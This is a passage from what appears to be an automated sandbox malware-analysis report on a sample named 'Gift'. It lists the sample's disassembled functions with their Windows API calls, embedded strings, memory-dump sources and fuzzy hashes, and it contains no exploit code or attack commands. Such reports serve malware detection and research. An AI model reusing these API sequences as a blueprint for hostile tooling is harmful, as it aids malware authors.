                                                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 002D24AF
                                                                          • KillTimer.USER32(-00000001,?,?,?,?,002D1AA7,00000000,?,?,002D1EBE,?,?), ref: 002D254A
                                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 0030BFE7
                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002D1AA7,00000000,?,?,002D1EBE,?,?), ref: 0030C018
                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002D1AA7,00000000,?,?,002D1EBE,?,?), ref: 0030C02F
                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,002D1AA7,00000000,?,?,002D1EBE,?,?), ref: 0030C04B
                                                                          • DeleteObject.GDI32(00000000), ref: 0030C05D
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                          • String ID: h6
                                                                          • API String ID: 641708696-2818403674
                                                                          • Opcode ID: b9adb337b0c81e7a25f0f84705c44f49eb9f3668ee987c7b5b019e1e0ca144e1
                                                                          • Instruction ID: f335c56125db0d1680be6c3bdb2776fdcedff72ff526bcf6f43e3b54ec047b4c
                                                                          • Opcode Fuzzy Hash: b9adb337b0c81e7a25f0f84705c44f49eb9f3668ee987c7b5b019e1e0ca144e1
                                                                          • Instruction Fuzzy Hash: 0561BE31139701DFDB2B9F14D959B2AB7B5FF50316F109A1AE44247AA0C3B2ACA4DF90
                                                                          Function 0033A27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0033A2C2
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0033A2E3
                                                                          • __swprintf.LIBCMT ref: 0033A33C
                                                                          • __swprintf.LIBCMT ref: 0033A355
                                                                          • _wprintf.LIBCMT ref: 0033A3FC
                                                                          • _wprintf.LIBCMT ref: 0033A41A
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                          • API String ID: 311963372-3080491070
                                                                          • Opcode ID: d4bd4022e043ce3c9b2dcff6812e63fcf3f603920c33afcbda7f6989c6219014
                                                                          • Instruction ID: 1bccf53cf8b4f319b3d63096fa10cdb3eb798a3824231ac9285534b0e1aacea8
                                                                          • Opcode Fuzzy Hash: d4bd4022e043ce3c9b2dcff6812e63fcf3f603920c33afcbda7f6989c6219014
                                                                          • Instruction Fuzzy Hash: 5051EE31950609AACF16EBE1CD86EEEB779AF04340F600566F505B2192EB352F78CF61
                                                                          Function 00330065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,0031F8B8,00000001,0000138C,00000001,00000000,00000001,?,00343FF9,00000000), ref: 0033009A
                                                                          • LoadStringW.USER32(00000000,?,0031F8B8,00000001), ref: 003300A3
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                          • GetModuleHandleW.KERNEL32(00000000,00397310,?,00000FFF,?,?,0031F8B8,00000001,0000138C,00000001,00000000,00000001,?,00343FF9,00000000,00000001), ref: 003300C5
                                                                          • LoadStringW.USER32(00000000,?,0031F8B8,00000001), ref: 003300C8
                                                                          • __swprintf.LIBCMT ref: 00330118
                                                                          • __swprintf.LIBCMT ref: 00330129
                                                                          • _wprintf.LIBCMT ref: 003301D2
                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 003301E9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                          • API String ID: 984253442-2268648507
                                                                          • Opcode ID: dcc172907e49092d6cb24335e3f5f5ea4729b0515f20087a243da76f607d4d55
                                                                          • Instruction ID: 97c24cd040be35e912048373eefa5ea10a140ce60c9393be495edc6a8bef6476
                                                                          • Opcode Fuzzy Hash: dcc172907e49092d6cb24335e3f5f5ea4729b0515f20087a243da76f607d4d55
                                                                          • Instruction Fuzzy Hash: B7415B72840259AACB15EBE1CD96DEEB37DAF14340F900565F605A2092EB356F28CF61
                                                                          Function 0033A995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002D4D37: __itow.LIBCMT ref: 002D4D62
                                                                            • Part of subcall function 002D4D37: __swprintf.LIBCMT ref: 002D4DAC
                                                                          • CharLowerBuffW.USER32(?,?), ref: 0033AA0E
                                                                          • GetDriveTypeW.KERNEL32 ref: 0033AA5B
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0033AAA3
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0033AADA
                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0033AB08
                                                                            • Part of subcall function 002E1821: _memmove.LIBCMT ref: 002E185B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                          • API String ID: 2698844021-4113822522
                                                                          • Opcode ID: 9421241c58756295eff24cc2a882a2e4f3446184057dddcb3b68f680e5425a49
                                                                          • Instruction ID: fee55f8048fd83667151ea121b5984ec14a63b8943d8aa49ebeffa68712e6423
                                                                          • Opcode Fuzzy Hash: 9421241c58756295eff24cc2a882a2e4f3446184057dddcb3b68f680e5425a49
                                                                          • Instruction Fuzzy Hash: BC519A711143059FC701EF21C88186AB3F9FF88758F50896DF896972A2DB31AE19CF92
                                                                          Function 0033A832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 0033A852
                                                                          • __swprintf.LIBCMT ref: 0033A874
                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0033A8B1
                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 0033A8D6
                                                                          • _memset.LIBCMT ref: 0033A8F5
                                                                          • _wcsncpy.LIBCMT ref: 0033A931
                                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0033A966
                                                                          • CloseHandle.KERNEL32(00000000), ref: 0033A971
                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 0033A97A
                                                                          • CloseHandle.KERNEL32(00000000), ref: 0033A984
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                          • String ID: :$\$\??\%s
                                                                          • API String ID: 2733774712-3457252023
                                                                          • Opcode ID: 4479927b1b7394dda3ecc21b97af96fc84f0aa1c46bb3e2be0d24454ebb1e20e
                                                                          • Instruction ID: ee691412b881f15c7e59acf5e28458fb4083f9ef67578c0bdd0a803ca9fac153
                                                                          • Opcode Fuzzy Hash: 4479927b1b7394dda3ecc21b97af96fc84f0aa1c46bb3e2be0d24454ebb1e20e
                                                                          • Instruction Fuzzy Hash: E231D27151020AABDB229FA0DC89FEB77BCEF89701F1141B6F608D6160E7B096448B24
                                                                          Function 0035C0A5 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,0035982C,?,?), ref: 0035C0C8
                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,0035982C,?,?,00000000,?), ref: 0035C0DF
                                                                          • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,0035982C,?,?,00000000,?), ref: 0035C0EA
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,0035982C,?,?,00000000,?), ref: 0035C0F7
                                                                          • GlobalLock.KERNEL32(00000000,?,?,?,?,0035982C,?,?,00000000,?), ref: 0035C100
                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,0035982C,?,?,00000000,?), ref: 0035C10F
                                                                          • GlobalUnlock.KERNEL32(00000000,?,?,?,?,0035982C,?,?,00000000,?), ref: 0035C118
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,0035982C,?,?,00000000,?), ref: 0035C11F
                                                                          • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,0035982C,?,?,00000000,?), ref: 0035C130
                                                                          • OleLoadPicture.OLEAUT32(?,00000000,00000000,00363C7C,?), ref: 0035C149
                                                                          • GlobalFree.KERNEL32(00000000), ref: 0035C159
                                                                          • GetObjectW.GDI32(00000000,00000018,?), ref: 0035C17D
                                                                          • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0035C1A8
                                                                          • DeleteObject.GDI32(00000000), ref: 0035C1D0
                                                                          • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0035C1E6
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                          • String ID:
                                                                          • API String ID: 3840717409-0
                                                                          • Opcode ID: 258dad1271639b56babddd3f4a92a4227c45c2bf37e6bc004e566d0a9a5cd544
                                                                          • Instruction ID: 445e14918b22752338aa7efe912d979fc655f1ee3e21bc3d9b251a4c20f22556
                                                                          • Opcode Fuzzy Hash: 258dad1271639b56babddd3f4a92a4227c45c2bf37e6bc004e566d0a9a5cd544
                                                                          • Instruction Fuzzy Hash: 2F415C75500204EFCB268F65CC49EAB7BBCEF89716F118058FD06D72A0CBB09940CB60
                                                                          Function 0035C854 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 002D29E2: GetWindowLongW.USER32(?,000000EB), ref: 002D29F3
                                                                          • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0035C8A4
                                                                          • GetFocus.USER32 ref: 0035C8B4
                                                                          • GetDlgCtrlID.USER32(00000000), ref: 0035C8BF
                                                                          • _memset.LIBCMT ref: 0035C9EA
                                                                          • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0035CA15
                                                                          • GetMenuItemCount.USER32(?), ref: 0035CA35
                                                                          • GetMenuItemID.USER32(?,00000000), ref: 0035CA48
                                                                          • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0035CA7C
                                                                          • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0035CAC4
                                                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0035CAFC
                                                                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0035CB31
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                                          • String ID: 0
                                                                          • API String ID: 1296962147-4108050209
                                                                          • Opcode ID: a17bc8876b6cfe8610c601979494517950d6e002567e04eeb35741b96ab22762
                                                                          • Instruction ID: 40c2a1f57dbdd2ead2e7529b8401b672227eb87dd6b3afbfcd10ae0e292691f7
                                                                          • Opcode Fuzzy Hash: a17bc8876b6cfe8610c601979494517950d6e002567e04eeb35741b96ab22762
                                                                          • Instruction Fuzzy Hash: 2D818D702183059FDB12CF14C885E6BBBE8FB88759F01552EFD95972A1C770D909CBA2
                                                                          Function 00328ACA Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00328E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00328E3C
                                                                            • Part of subcall function 00328E20: GetLastError.KERNEL32(?,00328900,?,?,?), ref: 00328E46
                                                                            • Part of subcall function 00328E20: GetProcessHeap.KERNEL32(00000008,?,?,00328900,?,?,?), ref: 00328E55
                                                                            • Part of subcall function 00328E20: HeapAlloc.KERNEL32(00000000,?,00328900,?,?,?), ref: 00328E5C
                                                                            • Part of subcall function 00328E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00328E73
                                                                            • Part of subcall function 00328EBD: GetProcessHeap.KERNEL32(00000008,00328916,00000000,00000000,?,00328916,?), ref: 00328EC9
                                                                            • Part of subcall function 00328EBD: HeapAlloc.KERNEL32(00000000,?,00328916,?), ref: 00328ED0
                                                                            • Part of subcall function 00328EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00328916,?), ref: 00328EE1
                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00328B2E
                                                                          • _memset.LIBCMT ref: 00328B43
                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00328B62
                                                                          • GetLengthSid.ADVAPI32(?), ref: 00328B73
                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 00328BB0
                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00328BCC
                                                                          • GetLengthSid.ADVAPI32(?), ref: 00328BE9
                                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00328BF8
                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00328BFF
                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00328C20
                                                                          • CopySid.ADVAPI32(00000000), ref: 00328C27
                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00328C58
                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00328C7E
                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00328C92
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                                          • String ID:
                                                                          • API String ID: 3996160137-0
                                                                          • Opcode ID: 844e19378344915e14b83be9c56bdb7cfb8b746788bae797fccf2da2ccc7f354
                                                                          • Instruction ID: e7ccb1f66c9e66bcd7bf618d8932cf7110be5bfcf402c47277dd3de3c1d758ab
                                                                          • Opcode Fuzzy Hash: 844e19378344915e14b83be9c56bdb7cfb8b746788bae797fccf2da2ccc7f354
                                                                          • Instruction Fuzzy Hash: 746179B1901229EFDF16DFA0ED49EEEBB79FF04300F048569F915A6290DB719A05CB60
                                                                          Function 00347A04 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetDC.USER32(00000000), ref: 00347A79
                                                                          • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00347A85
                                                                          • CreateCompatibleDC.GDI32(?), ref: 00347A91
                                                                          • SelectObject.GDI32(00000000,?), ref: 00347A9E
                                                                          • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00347AF2
                                                                          • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00347B2E
                                                                          • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00347B52
                                                                          • SelectObject.GDI32(00000006,?), ref: 00347B5A
                                                                          • DeleteObject.GDI32(?), ref: 00347B63
                                                                          • DeleteDC.GDI32(00000006), ref: 00347B6A
                                                                          • ReleaseDC.USER32(00000000,?), ref: 00347B75
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                          • String ID: (
                                                                          • API String ID: 2598888154-3887548279
                                                                          • Opcode ID: 71aa21d1a498cc63dc19a0becfc09900bfa6dc7eab80d636fda350b69af77a18
                                                                          • Instruction ID: fa0bfba414b33b2de5ff8a8ffa6f2a03729fb6a43965c84aea850622fd04e246
                                                                          • Opcode Fuzzy Hash: 71aa21d1a498cc63dc19a0becfc09900bfa6dc7eab80d636fda350b69af77a18
                                                                          • Instruction Fuzzy Hash: FA512975904209EFCB16CFA8CC85EAFBBF9EF48310F14851DF95AAB250D771A9418B60
                                                                          Function 0033A48D Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0033A4D4
                                                                            • Part of subcall function 002E1A36: _memmove.LIBCMT ref: 002E1A77
                                                                          • LoadStringW.USER32(?,?,00000FFF,?), ref: 0033A4F6
                                                                          • __swprintf.LIBCMT ref: 0033A54F
                                                                          • __swprintf.LIBCMT ref: 0033A568
                                                                          • _wprintf.LIBCMT ref: 0033A61E
                                                                          • _wprintf.LIBCMT ref: 0033A63C
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                          • API String ID: 311963372-2391861430
                                                                          • Opcode ID: 0bec2dc6ea263c5c5ac8450cf0cc89f9cb238d1ee3193db00a0462b0cc414920
                                                                          • Instruction ID: e08477815b0e368a3f713218ccbefd5f1d4dd43ed84b45d68e5cb2c3b746b5bb
                                                                          • Opcode Fuzzy Hash: 0bec2dc6ea263c5c5ac8450cf0cc89f9cb238d1ee3193db00a0462b0cc414920
                                                                          • Instruction Fuzzy Hash: CF51CE71850649ABCF16EBE0CD96EEEB779AF04340F500566F505B20A2EB312F68CF61
                                                                          Function 00339710 Relevance: 19.8, APIs: 13, Instructions: 322fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 0033951A: __time64.LIBCMT ref: 00339524
                                                                            • Part of subcall function 002E4A8C: _fseek.LIBCMT ref: 002E4AA4
                                                                          • __wsplitpath.LIBCMT ref: 003397EF
                                                                            • Part of subcall function 002F431E: __wsplitpath_helper.LIBCMT ref: 002F435E
                                                                          • _wcscpy.LIBCMT ref: 00339802
                                                                          • _wcscat.LIBCMT ref: 00339815
                                                                          • __wsplitpath.LIBCMT ref: 0033983A
                                                                          • _wcscat.LIBCMT ref: 00339850
                                                                          • _wcscat.LIBCMT ref: 00339863
                                                                            • Part of subcall function 00339560: _memmove.LIBCMT ref: 00339599
                                                                            • Part of subcall function 00339560: _memmove.LIBCMT ref: 003395A8
                                                                          • _wcscmp.LIBCMT ref: 003397AA
                                                                            • Part of subcall function 00339CF1: _wcscmp.LIBCMT ref: 00339DE1
                                                                            • Part of subcall function 00339CF1: _wcscmp.LIBCMT ref: 00339DF4
                                                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00339A0D
                                                                          • _wcsncpy.LIBCMT ref: 00339A80
                                                                          • DeleteFileW.KERNEL32(?,?), ref: 00339AB6
                                                                          • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00339ACC
                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00339ADD
                                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00339AEF
                                                                          Memory Dump Source
                                                                          • Source File: 0000000B.00000002.3215432096.00000000002D1000.00000020.00000001.01000000.00000006.sdmp, Offset: 002D0000, based on PE: true
                                                                          • Associated: 0000000B.00000002.3215400644.00000000002D0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000360000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215577782.0000000000386000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3215911966.0000000000390000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                          • Associated: 0000000B.00000002.3216021536.0000000000399000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_11_2_2d0000_Gift.jbxd
                                                                          Similarity
                                                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                                          • String ID:
                                                                          • API String ID: 1500180987-0
                                                                          • Opcode ID: 8625d88f7a170d5b7e08eb4067ae101ff9999bff818452aa4be9f1965bf2e0a2
                                                                          • Instruction ID: cdfe1f133706da2b8b677f8d6ea8017e4f4571fcbfcf821f24f7326b1d57e695
